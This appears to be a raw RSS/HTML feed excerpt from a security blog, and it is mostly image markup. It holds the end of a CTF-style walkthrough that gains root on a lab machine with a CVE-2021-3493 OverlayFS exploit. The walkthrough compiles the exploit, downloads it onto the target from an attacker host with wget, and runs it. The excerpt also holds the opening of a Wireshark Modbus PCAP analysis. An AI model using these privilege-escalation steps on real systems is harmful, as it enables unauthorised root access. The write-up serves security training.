data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:827,&quot;width&quot;:1731,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:224188,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c641c62-c50a-4ab1-a4e2-3d6a73625507_1731x827.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6_rI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!6_rI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!6_rI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!6_rI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01b2eba3-ad6f-42bb-b70c-943cf2c34176_1731x827.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And it&#8217;s an OverlayFS under CVE-2021-3493. </p><p>Let&#8217;s do it.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Nm5K!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Nm5K!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png 424w, https://substackcdn.com/image/fetch/$s_!Nm5K!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png 848w, https://substackcdn.com/image/fetch/$s_!Nm5K!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png 1272w, https://substackcdn.com/image/fetch/$s_!Nm5K!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Nm5K!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png" width="372" height="310" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:310,&quot;width&quot;:372,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:227040,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Nm5K!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png 424w, https://substackcdn.com/image/fetch/$s_!Nm5K!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png 848w, https://substackcdn.com/image/fetch/$s_!Nm5K!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png 1272w, https://substackcdn.com/image/fetch/$s_!Nm5K!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F63a5a3ec-c8bd-43d2-8393-d9e12a16eed9_372x310.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ol start="7"><li><p><em>Gain root Access via OverlayFS Exploit</em></p></li></ol><p>Here&#8217;s a GitHub repo I found useful:</p><ul><li><p><a href="https://github.com/briskets/CVE-2021-3493">github.com/briskets/CVE-2021-3493</a></p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BnIY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BnIY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png 424w, https://substackcdn.com/image/fetch/$s_!BnIY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png 848w, https://substackcdn.com/image/fetch/$s_!BnIY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png 1272w, https://substackcdn.com/image/fetch/$s_!BnIY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BnIY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png" width="1456" height="690" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:690,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:105490,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BnIY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png 424w, https://substackcdn.com/image/fetch/$s_!BnIY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png 848w, https://substackcdn.com/image/fetch/$s_!BnIY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png 1272w, https://substackcdn.com/image/fetch/$s_!BnIY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3282ef0e-aabc-4e1e-9e10-f5306f010286_1603x760.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Let&#8217;s just compile it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">www-data@photographer:/tmp$ uname -a
uname -a
Linux photographer 4.15.0-115-generic #116~16.04.1-Ubuntu SMP Wed Aug 26 17:36:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux</code></pre></div><p>That&#8217;s the Target machine, so now we need to specify -static mode:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo gcc pwn.c -o pwn -static</code></pre></div><p>Then we import our binary (pwn) into target:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">www-data@photographer:/tmp$ wget http://192.168.45.214/pwn
wget http://192.168.45.214/pwn
--2026-03-01 00:57:44--  http://192.168.45.214/pwn
Connecting to 192.168.45.214:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 819240 (800K) [application/octet-stream]
Saving to: 'pwn'

pwn                 100%[===================&gt;] 800.04K  3.36MB/s    in 0.2s    

2026-03-01 00:57:44 (3.36 MB/s) - 'pwn' saved [819240/819240]

www-data@photographer:/tmp$ chmod +x pwn
chmod +x pwn</code></pre></div><p>And . . .Done!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">www-data@photographer:/tmp$ ./pwn
./pwn
bash-4.3# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
bash-4.3# whoami
whoami
root</code></pre></div><p>We successfully gain Administrator.</p><p>Happy hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[WireShark Dumping Upon Pwn3d! ICS Networks]]></title><description><![CDATA[Solving ICS, an industrial Networks ins getting Pwned! here we will analyze PCAP file with WireShark and identify some malicious Packet request.]]></description><link>https://byt3n33dl3.substack.com/p/wireshark-dumping-upon-pwn3d-ics</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/wireshark-dumping-upon-pwn3d-ics</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Sun, 01 Mar 2026 02:37:53 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!o7Ia!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2><strong>ICS CTF</strong></h2><p>All we got is a singular PCAP file.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ll
total 16
-rw-r--r-- 1 root root 12778 May 17  2024 traffic.pcapng</code></pre></div><p>Let&#8217;s open it.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hUp7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hUp7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png 424w, https://substackcdn.com/image/fetch/$s_!hUp7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png 848w, https://substackcdn.com/image/fetch/$s_!hUp7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png 1272w, https://substackcdn.com/image/fetch/$s_!hUp7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hUp7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png" width="1456" height="690" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:690,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:333834,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189515963?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hUp7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png 424w, https://substackcdn.com/image/fetch/$s_!hUp7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png 848w, https://substackcdn.com/image/fetch/$s_!hUp7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png 1272w, https://substackcdn.com/image/fetch/$s_!hUp7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6aaa7ad-4a2d-480a-80b5-dc0b8792cca3_1920x910.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>In the inside PCAP file, some Length, Code, and other indicators have little to separator between normal and none, but after careful examination, we can see that the Length could be delivering something:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!o7Ia!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!o7Ia!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png 424w, https://substackcdn.com/image/fetch/$s_!o7Ia!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png 848w, https://substackcdn.com/image/fetch/$s_!o7Ia!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png 1272w, https://substackcdn.com/image/fetch/$s_!o7Ia!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!o7Ia!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png" width="1920" height="910" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:910,&quot;width&quot;:1920,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:378119,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189515963?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0beba1f2-5f06-452f-a5cd-66a3cc0e0ad2_1920x910.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!o7Ia!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png 424w, https://substackcdn.com/image/fetch/$s_!o7Ia!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png 848w, https://substackcdn.com/image/fetch/$s_!o7Ia!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png 1272w, https://substackcdn.com/image/fetch/$s_!o7Ia!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c545230-e665-4ee1-8064-084dc98a8c17_1920x910.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Some are higher than 100, others reach up-to 200+</p><p>Btw from here we know its a Modbus is an old industrial communication protocol used by PLCs.</p><p>The traffic tells us that device at 192.168.178.23 repeatedly querying a PLC at 192.168.178.105 using Function Code 102.</p><p>Let&#8217;s look-up for some Length that&#8217;s beyond score 90:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">frame.len &gt; 90 &amp;&amp; modbus &amp;&amp; tcp.port == 502</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oGnN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 